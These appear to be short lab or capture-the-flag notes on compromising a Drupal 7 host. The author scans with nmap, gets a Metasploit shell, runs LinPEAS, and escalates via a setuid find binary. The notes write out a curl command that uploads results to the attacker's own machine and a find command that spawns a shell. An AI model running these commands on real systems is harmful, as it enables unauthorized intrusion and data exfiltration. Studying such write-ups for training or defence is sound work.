192.168.105.193
Nmap scan
nmap 192.168.105.193 -p- -sV -T4 -A
No banner
Found that Drupal 7 was the version installed.
Used Metasploit to get a shell... I know script kiddie
Uploaded Linpeas and ran it. Then sent it back to my box to review.
Linpeas found that find was stickied.
Using priv esc for find Souce: https://gtfobins.github.io/gtfobins/find/arrow-up-right
Last updated 3 years ago
curl -X POST http://192.168.49.105:8000/upload -F '[email protected]'
find . -exec /bin/sh \; -quit
